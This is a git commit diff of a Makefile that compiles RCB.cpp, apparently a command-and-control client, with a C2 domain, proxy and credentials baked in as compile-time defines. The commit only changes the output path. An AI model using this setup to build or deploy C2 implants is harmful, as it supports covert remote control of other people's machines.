Modified binary destination

This commit is contained in:
jacobeva 2023-03-08 12:55:12 +00:00
parent c0a1c2316f
commit f08cc6849b
No known key found for this signature in database
GPG Key ID: 0B92E083BBCCAA1E
1 changed files with 1 additions and 1 deletions

View File

@ -4,4 +4,4 @@ $(info c2 domain is $(sC2Domain))
$(info proxy is $(sProxy))
default:
g++ -DsUsername="$(sUsername)" -DsPassword="$(sPassword)" -DsC2Domain="$(sC2Domain)" -DsProxy="$(sProxy)" RCB.cpp -o bin/RCB -lcurl
g++ -DsUsername="$(sUsername)" -DsPassword="$(sPassword)" -DsC2Domain="$(sC2Domain)" -DsProxy="$(sProxy)" RCB.cpp -o RCB -lcurl